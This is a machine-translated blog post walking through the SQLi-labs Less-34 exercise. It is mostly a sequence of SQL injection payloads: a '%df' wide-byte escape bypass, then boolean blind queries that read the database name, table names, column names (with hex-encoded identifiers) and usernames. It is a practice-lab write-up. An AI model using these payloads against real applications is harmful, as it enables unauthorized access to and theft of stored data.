当前位置:网站首页>SQL injection less34 (post wide byte injection + Boolean blind injection)
SQL injection less34 (post wide byte injection + Boolean blind injection)
2022-07-28 22:17:00 【Happy star】
Pre knowledge :【Try to Hack】 Wide byte Injection

Try the universal password ' or 1#
It's escaped , Use wide byte injection %df' or 1#
Found no effect , also %df It's directly displayed ( It didn't show up before , It is a figure of a question mark )
Grab the bag , Right % the URL code 1%25df%27+or+1%23
We use it burp Just inject wide bytes %df' or 1#
%df' or length(database())=8#
%df' or ascii(substr(database(),1,1))=115#
%df' or ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101#
%df' or ascii(substr((select column_name from information _schema.columns where table_name="users" limit 0,1),1,1))=105#
because "users" Quotation marks are used , Use subqueries or 16 Hexadecimal way ( Hex succeeded , But subquery , There is something wrong )%df' or ascii(substr((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),1,1))=105#
%df' or ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=(select table_schema from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)),1,1))=105#
%df' or ascii(substr((select username from users limit 0,1), 1,1))=68#
边栏推荐
猜你喜欢

Kubeedge releases white paper on cloud native edge computing threat model and security protection technology

Aimbetter insight into your database, DPM and APM solutions

HYDAC溢流阀DB08A-01-C-N-500V

HCIP(12)

字节一面:TCP 和 UDP 可以使用同一个端口吗?

JS DOM编程之平平无奇小练习

腾讯云数据库负责人林晓斌借一亿元炒股?知情人士:金额不实
![Introduction to C language [detailed]](/img/ac/9ba2e298faabd8dc4c76575ea182d1.png)
Introduction to C language [detailed]

HCIP第七次实验

Kubevera plug-in addons download address
随机推荐
CDN working principle
HCIP(13)
Technology selection rust post analysis
Differences of display values
40. 组合总和 II
Use pl/sql
[machine learning] naive Bayesian classification of text -- Classification of people's names and countries
Getting started with Oracle
hcip实验(15)
kubevela插件addons下载地址
罗克韦尔AB PLC RSLogix数字量IO模块基本介绍
Principle of object. Prototype. ToString. Call()
2021 mathematical modeling group B exercise
数据可视化新闻,不一样的新闻报道形式
04. Default value of toref
Clearing of applet component timer
How does MySQL archive data?
90. Subset II
Byte side: can TCP and UDP use the same port?
SQL注入 Less34(POST型宽字节注入+布尔盲注)